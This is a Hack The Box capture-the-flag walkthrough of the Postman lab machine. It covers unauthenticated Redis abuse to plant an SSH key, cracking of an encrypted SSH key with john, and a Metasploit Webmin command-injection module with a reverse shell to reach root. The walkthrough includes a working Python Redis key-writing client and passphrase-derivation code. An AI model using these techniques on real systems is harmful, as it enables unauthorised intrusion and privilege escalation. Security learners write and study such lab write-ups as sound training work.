
hack the box walkthrough – Postman machine
A new walkthrough to start 2021 on the right track. Today we do the easy Linux machine Postman on Hack The Box.

Let’s jump in!
Enumeration
As usual we start our enumeration with an nmap scan of all TCP ports:
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.74.131 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 10:50 EST
Nmap scan report for 10.129.74.131
Host is up (0.044s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.11 seconds
On port 80 an Apache server is running, but basic enumeration with dirbuster and nikto turned up nothing interesting.

On port 6379 there is a Redis instance.
Redis describes itself as an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker. Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams. Redis has built-in replication, Lua scripting, LRU eviction, transactions, and different levels of on-disk persistence, and provides high availability via Redis Sentinel and automatic partitioning with Redis Cluster. What matters to us is that a Redis instance reachable without a password lets any client run administrative commands, including changing where it writes its files.
With redis-cli I check whether the instance accepts unauthenticated connections:
[email protected]:~/Documents$ redis-cli -h 10.129.74.131
10.129.2.1:6379>
It does! 😀
To get the configuration of this instance I just need to run CONFIG GET *:
10.129.74.131:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/var/log/redis/redis-server.log"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
15) "slave-announce-ip"
16) ""
17) "maxmemory"
18) "0"
19) "proto-max-bulk-len"
20) "536870912"
21) "client-query-buffer-limit"
22) "1073741824"
23) "maxmemory-samples"
24) "5"
25) "lfu-log-factor"
26) "10"
27) "lfu-decay-time"
28) "1"
29) "timeout"
30) "0"
31) "active-defrag-threshold-lower"
32) "10"
33) "active-defrag-threshold-upper"
34) "100"
35) "active-defrag-ignore-bytes"
36) "104857600"
37) "active-defrag-cycle-min"
38) "25"
39) "active-defrag-cycle-max"
40) "75"
41) "auto-aof-rewrite-percentage"
42) "100"
43) "auto-aof-rewrite-min-size"
44) "67108864"
45) "hash-max-ziplist-entries"
46) "512"
47) "hash-max-ziplist-value"
48) "64"
49) "list-max-ziplist-size"
50) "-2"
51) "list-compress-depth"
52) "0"
53) "set-max-intset-entries"
54) "512"
55) "zset-max-ziplist-entries"
56) "128"
57) "zset-max-ziplist-value"
58) "64"
59) "hll-sparse-max-bytes"
60) "3000"
61) "lua-time-limit"
62) "5000"
63) "slowlog-log-slower-than"
64) "10000"
65) "latency-monitor-threshold"
66) "0"
67) "slowlog-max-len"
68) "128"
69) "port"
70) "6379"
71) "cluster-announce-port"
72) "0"
73) "cluster-announce-bus-port"
74) "0"
75) "tcp-backlog"
76) "511"
77) "databases"
78) "16"
79) "repl-ping-slave-period"
80) "10"
81) "repl-timeout"
82) "60"
83) "repl-backlog-size"
84) "1048576"
85) "repl-backlog-ttl"
86) "3600"
87) "maxclients"
88) "10000"
89) "watchdog-period"
90) "0"
91) "slave-priority"
92) "100"
93) "slave-announce-port"
94) "0"
95) "min-slaves-to-write"
96) "0"
97) "min-slaves-max-lag"
98) "10"
99) "hz"
100) "10"
101) "cluster-node-timeout"
102) "15000"
103) "cluster-migration-barrier"
104) "1"
105) "cluster-slave-validity-factor"
106) "10"
107) "repl-diskless-sync-delay"
108) "5"
109) "tcp-keepalive"
110) "300"
111) "cluster-require-full-coverage"
112) "yes"
113) "cluster-slave-no-failover"
114) "no"
115) "no-appendfsync-on-rewrite"
116) "no"
117) "slave-serve-stale-data"
118) "yes"
119) "slave-read-only"
120) "yes"
121) "stop-writes-on-bgsave-error"
122) "yes"
123) "daemonize"
124) "yes"
125) "rdbcompression"
126) "yes"
127) "rdbchecksum"
128) "yes"
129) "activerehashing"
130) "yes"
131) "activedefrag"
132) "no"
133) "protected-mode"
134) "no"
135) "repl-disable-tcp-nodelay"
136) "no"
137) "repl-diskless-sync"
138) "no"
139) "aof-rewrite-incremental-fsync"
140) "yes"
141) "aof-load-truncated"
142) "yes"
143) "aof-use-rdb-preamble"
144) "no"
145) "lazyfree-lazy-eviction"
146) "no"
147) "lazyfree-lazy-expire"
148) "no"
149) "lazyfree-lazy-server-del"
150) "no"
151) "slave-lazy-flush"
152) "no"
153) "maxmemory-policy"
154) "noeviction"
155) "loglevel"
156) "notice"
157) "supervised"
158) "no"
159) "appendfsync"
160) "everysec"
161) "syslog-facility"
162) "local0"
163) "appendonly"
164) "no"
165) "dir"
166) "/var/lib/redis"
167) "save"
168) "900 1 300 10 60 10000"
169) "client-output-buffer-limit"
170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
171) "unixsocketperm"
172) "0"
173) "slaveof"
174) ""
175) "notify-keyspace-events"
176) ""
177) "bind"
178) "0.0.0.0 ::1"
10.129.74.131:6379>
The interesting entries are 165 and 166: the working directory is /var/lib/redis, which is also the home directory of the redis user. Together with an empty requirepass (entries 3 and 4) and protected-mode set to no (entries 133 and 134), this means an unauthenticated client can repoint dir and dbfilename with CONFIG SET and make SAVE write the RDB dump to /var/lib/redis/.ssh/authorized_keys. The dump is mostly binary, but sshd reads authorized_keys line by line and ignores what it cannot parse, so if my SSH public key sits on a line of its own inside the dump, I can log in via SSH as redis.
For that I used the Redis Server Exploit Python script, which you can find here. It is then very easy: run the script with two arguments (the IP of the server and the user the Redis instance runs as) and you get an SSH connection. Note that I first point dir at /var/lib/redis/.ssh/ by hand with redis-cli; the script's own attempt to change the directory fails with Permission denied below, but since dir is already set, the SAVE that follows still writes the dump where it needs to go:
[email protected]:~/Documents$ redis-cli -h 10.129.74.131
10.129.74.131:6379> config set dir /var/lib/redis/.ssh/
OK
10.129.74.131:6379> config set dbfilename "authorized_keys"
OK
10.129.74.131:6379> save
OK
10.129.74.131:6379> exit
[email protected]:~/Documents$ python redis.py 10.129.74.131 redis
*******************************************************************
* [+] [Exploit] Exploiting misconfigured REDIS SERVER*
* [+] AVINASH KUMAR THAPA aka "-Acid"
*******************************************************************
SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
/home/kali/.ssh/id_rsa already exists.
Overwrite (y/n)?
Keys Generated Successfully
OK
OK
OK
(error) ERR Changing directory: Permission denied
OK
OK
You'll get shell in sometime..Thanks for your patience
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
[email protected]:~$
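The Redis part of the chain, as an added example that is not code from the post or from the Redis Server Exploit script: a stdlib-only Python RESP client that audits the CONFIG GET * reply for the settings that matter here (empty requirepass, protected-mode no, bind on all interfaces, a writable dir) and builds the same SET / CONFIG SET / SAVE sequence the script sends. The key name sshkey, the two sample replies and the run() helper are assumptions constructed from values on this page.

```python
# Added example, not code from the post or from the Redis Server Exploit script it runs: a
# stdlib-only RESP client that audits a CONFIG GET * reply and builds the SET / CONFIG SET /
# SAVE frames that land an SSH public key in /var/lib/redis/.ssh/authorized_keys. The key
# name "sshkey" and the two sample replies are assumptions constructed from values in the post.
import io
import socket
from typing import Any, List, Optional

def resp_encode(*args: str) -> bytes:
    """Frame a command as a RESP array of bulk strings, exactly what redis-cli sends."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)

def resp_read(stream) -> Any:
    """Read one RESP reply from a file-like object (socket.makefile('rb') or BytesIO)."""
    kind = stream.read(1)
    line = stream.readline()[:-2]  # drop the trailing CRLF
    if kind == b"+":
        return line.decode()  # simple string such as +OK
    if kind == b"-":
        return RuntimeError(line.decode())  # error reply such as -ERR Changing directory
    if kind == b":":
        return int(line)
    if kind == b"$":
        size = int(line)
        if size < 0:
            return None  # null bulk string
        data = stream.read(size)
        stream.read(2)  # CRLF after the payload
        return data.decode()
    if kind == b"*":
        return [resp_read(stream) for _ in range(int(line))]
    raise ValueError(f"unexpected RESP type byte {kind!r}")

def parse_reply(data: bytes) -> Any:
    return resp_read(io.BytesIO(data))

def audit_config(flat: List[str]) -> List[str]:
    """CONFIG GET * answers with a flat [name, value, name, value, ...] array; turn it into findings."""
    cfg = dict(zip(flat[0::2], flat[1::2]))
    findings = []
    if cfg.get("requirepass", "") == "":
        findings.append("requirepass is empty: every client that connects is an administrator")
        if "dir" in cfg:
            findings.append(f"CONFIG SET can move SAVE's output away from {cfg['dir']}/{cfg.get('dbfilename')}")
    if cfg.get("protected-mode") == "no":
        findings.append("protected-mode no: remote clients are accepted without authentication")
    if any(addr in ("0.0.0.0", "*", "::") for addr in cfg.get("bind", "").split()):
        findings.append(f"listening on all interfaces: bind {cfg['bind']}")
    return findings

def padded_pubkey(pubkey_line: str) -> str:
    """sshd reads authorized_keys line by line and skips lines it cannot parse; the RDB header and
    trailer around the value are binary, so blank lines on both sides put the key alone on a clean line."""
    return "\n\n" + pubkey_line.strip() + "\n\n"

def authorized_keys_plan(pubkey_line: str, ssh_dir: str = "/var/lib/redis/.ssh",
                         key_name: str = "sshkey") -> List[bytes]:
    """The post's chain as RESP frames. No FLUSHALL: it is not needed and it wipes the instance."""
    return [
        resp_encode("SET", key_name, padded_pubkey(pubkey_line)),
        resp_encode("CONFIG", "SET", "dir", ssh_dir),
        resp_encode("CONFIG", "SET", "dbfilename", "authorized_keys"),
        resp_encode("SAVE"),
    ]

def run(host: str, port: int = 6379, pubkey_line: Optional[str] = None, timeout: float = 5.0) -> List[str]:
    """Connect without credentials, audit, and if a key is given perform the write (network I/O)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rb")
        def call(frame: bytes) -> Any:
            sock.sendall(frame)
            return resp_read(stream)
        reply = call(resp_encode("CONFIG", "GET", "*"))
        if isinstance(reply, RuntimeError):
            return [f"CONFIG GET refused ({reply}): a password is set or CONFIG is renamed"]
        results = audit_config(reply)
        if pubkey_line and results:
            for frame in authorized_keys_plan(pubkey_line):
                name = frame.split(b"\r\n")[2].decode()
                out = call(frame)
                results.append(f"{name} -> {out}")
                if isinstance(out, RuntimeError):
                    break  # e.g. "ERR Changing directory: Permission denied" when .ssh does not exist
        return results

# Constructed from the values in the post's CONFIG GET * output; not a captured reply.
SAMPLE_CONFIG_REPLY = resp_encode("requirepass", "", "protected-mode", "no", "bind", "0.0.0.0 ::1",
                                  "dir", "/var/lib/redis", "dbfilename", "dump.rdb")
# The same settings as they should look after hardening (also constructed).
HARDENED_CONFIG_REPLY = resp_encode("requirepass", "long-random-secret", "protected-mode", "yes",
                                    "bind", "127.0.0.1", "dir", "/var/lib/redis", "dbfilename", "dump.rdb")
```

Calling run("10.129.74.131", 6379, open("~/.ssh/id_rsa.pub").read()) reproduces the chain; the same audit doubles as the fix list for the defender: set requirepass, bind 127.0.0.1, keep protected-mode yes, and rename or disable CONFIG in redis.conf (rename-command CONFIG "") so SAVE cannot be retargeted even by an authenticated client.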
Lateral movement
With LinPEAS I found a backup of an SSH private key in /opt/id_rsa.bak. It belongs to Matt and is passphrase-protected (Proc-Type: 4,ENCRYPTED), so it has to be cracked before it can be used.

[email protected]:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
[email protected]:~$
We can crack the passphrase with John the Ripper: ssh2john turns the key file into a hash, then john runs rockyou against it.
[email protected]:~/Documents$ locate ssh2john.py
/usr/share/john/ssh2john.py
[email protected]:~/Documents$ python /usr/share/john/ssh2john.py id_rsamatt > id_rsa.hash
[email protected]:~/Documents$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsamatt)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:13 DONE (2021-01-01 08:07) 0.07645g/s 1096Kp/s 1096Kc/s 1096KC/sa6_123..*7¡Vamos!
Session completed
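What ssh2john extracts from Matt's key and why john gets through rockyou so fast, as an added example that is not code from the post or from John the Ripper: a Python snippet that parses the Proc-Type / DEK-Info header of a legacy encrypted PEM key and derives the candidate 3DES key the way OpenSSL's EVP_BytesToKey does, which for this format is just two MD5 calls per guess (the "iteration count 2" in the john output above). The two header lines are copied from the key shown on this page; the encrypted body is omitted, so nothing is decrypted. Function names are my own.

```python
# Added example, not code from the post or from John the Ripper: what ssh2john pulls out of a
# legacy encrypted PEM key and the key derivation that makes such keys cheap to guess. The header
# below is copied from Matt's key as shown in the post; the encrypted body is omitted, so this
# derives the candidate 3DES key for a passphrase but decrypts nothing. Function names are mine.
import hashlib
import math
from typing import Dict, Tuple

MATT_KEY_HEADER = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
"""

# Ciphers OpenSSL uses for "traditional" PEM encryption and their key sizes in bytes.
PEM_CIPHER_KEYLEN = {"DES-EDE3-CBC": 24, "AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32}

def parse_pem_header(text: str) -> Tuple[str, bytes]:
    """Return (cipher, IV) from the Proc-Type / DEK-Info lines; ssh2john records both in its hash."""
    fields = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith("-----"):
            name, _, value = line.partition(":")
            fields[name.strip()] = value.strip()
    if fields.get("Proc-Type") != "4,ENCRYPTED":
        raise ValueError("not an encrypted legacy PEM key (OpenSSH-format keys use bcrypt-pbkdf instead)")
    cipher, _, iv_hex = fields["DEK-Info"].partition(",")
    if cipher not in PEM_CIPHER_KEYLEN:
        raise ValueError(f"unsupported DEK-Info cipher {cipher}")
    return cipher, bytes.fromhex(iv_hex)

def md5_rounds(keylen: int) -> int:
    """EVP_BytesToKey emits 16 bytes of MD5 per round: two rounds for 3DES, one for AES-128."""
    return math.ceil(keylen / 16)

def evp_bytes_to_key(passphrase: bytes, iv: bytes, keylen: int) -> bytes:
    """OpenSSL's EVP_BytesToKey with MD5 and count=1, as PEM_do_header calls it: the first 8
    bytes of the IV act as the salt and round i is MD5(D[i-1] || passphrase || salt)."""
    salt = iv[:8]
    derived, prev = b"", b""
    while len(derived) < keylen:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        derived += prev
    return derived[:keylen]

def candidate_key(pem_text: str, passphrase: str) -> Dict[str, object]:
    """Everything a cracker computes per guess before the single 3DES/AES trial decryption."""
    cipher, iv = parse_pem_header(pem_text)
    keylen = PEM_CIPHER_KEYLEN[cipher]
    return {"cipher": cipher, "iv": iv.hex(), "md5_rounds": md5_rounds(keylen),
            "key": evp_bytes_to_key(passphrase.encode(), iv, keylen).hex()}

if __name__ == "__main__":
    info = candidate_key(MATT_KEY_HEADER, "computer2008")
    print(f"{info['cipher']}: {info['md5_rounds']} MD5 round(s) per guess -> key {info['key']}")
```

Two MD5 calls and one 3DES block per candidate is why john reports around a million guesses per second here. A key in OpenSSH's native format (-----BEGIN OPENSSH PRIVATE KEY-----) uses bcrypt-pbkdf with 16 rounds by default, which john shows as Bcrypt/AES in the Cost 1 line and which is orders of magnitude slower; any current ssh-keygen (or ssh-keygen -o on older releases) produces that format instead of the legacy PEM one.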
Still, I couldn't use it for an SSH connection. Two things to note about the attempt below: no username is given, so ssh offers the key for my local user rather than for Matt, and the "invalid format" line is only a warning about the missing .pub companion of the key file (ssh still goes on to ask for the passphrase, so the private key itself loaded fine). The server then closes the connection outright:
[email protected]:~/Documents$ ssh -i id_rsamatt 10.129.74.131
load pubkey "id_rsamatt": invalid format
Enter passphrase for key 'id_rsamatt':
Connection closed by 10.129.74.131 port 22
Privilege Escalation
I then remember that Webmin is running on port 10000. Passphrases get reused as passwords all the time, so I try the credentials Matt / computer2008 there, and bingo, I'm logged in:

Searchsploit has a match for Webmin 1.910: the authenticated command injection in the Package Updates module (CVE-2019-12840), which Metasploit ships as exploit/linux/http/webmin_packageup_rce. Since we now have valid Webmin credentials, the module has everything it needs:

msf6 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910
msf6 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.129.74.131
rhosts => 10.129.74.131
msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost tun0
lhost => 10.10.14.105
msf6 exploit(linux/http/webmin_packageup_rce) > run
And we are root! Webmin's miniserv runs as root, so the injected command runs as root too and no further escalation is needed.
